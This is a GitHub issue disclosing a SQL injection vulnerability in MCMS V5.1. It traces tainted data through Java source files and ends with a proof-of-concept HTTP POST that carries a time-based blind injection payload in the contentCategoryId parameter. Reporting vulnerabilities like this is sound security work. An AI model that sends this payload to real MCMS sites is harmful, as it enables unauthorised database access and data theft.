Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

MCMS V5.1 /src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java hava a SQL Injection Vulnerability #58

Closed
chauncyman opened this issue Dec 5, 2021 · 0 comments

Comments

@chauncyman
Copy link

chauncyman commented Dec 5, 2021

Vulnerability file:

/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java

#Vulnerability tracking path:

1. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java:72行  --The return value of call queryChildren() is tained
2. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java:72行  --Tainted value is returned
3. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:168行  --The return value of call
queryChildren() is tained
4. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:168行  --Tainted value is assigned to variable columns
5. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value enters call iterator() from the this argument, then taints the return value
6. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value is assigned to variable column~iterator
7.  MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value enters call next() from the this argument, then taints the return value
8. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value is assigned to variable column
9. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:181行  --Tainted value enters call getId() from the this argument, then taints the return value
10. MCMS-master/src/main/java/net/mingsoft/cms/entity/CategoryEntity.java:52行  --Tainted variable this.id is returned
11. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:181行  --Tainted value enters call setCategoryId() from the 1st argument, then taints the this argument
12. MCMS-master/src/main/java/net/mingsoft/cms/entity/ContentEntity.java:148行  --Tainted value is assigned to variable this.categoryId
13. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:183行  --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
14. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java:77行  --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
15. MCMS-master/src/main/java/net/mingsoft/cms/dao/IContentDao.xml:253行  --categoryId

The risk of SQLI type is triggered, caused by the input parameter categoryId, value:
image

poc

POST /ms/cms/content/list.do HTTP/1.1
Host: cms.demo.mingsoft.net
Content-Length: 21
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://cms.demo.mingsoft.net
Referer: http://cms.demo.mingsoft.net/ms/cms/category/form.do?id=158&childId=undefined
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ****
Connection: close

contentCategoryId=158'||(SELECT 0x7155656f WHERE 5755=5755 AND (SELECT 1979 FROM (SELECT(SLEEP(5)))dYQF))||'

image

image
image

@chauncyman chauncyman changed the title MCMS V5.1 /src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java hava a SQL Injection Vulnerability MCMS V5.1 /src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java hava a SQL Injection Vulnerability Dec 6, 2021
@killfen killfen closed this as completed Sep 9, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants
@killfen @chauncyman and others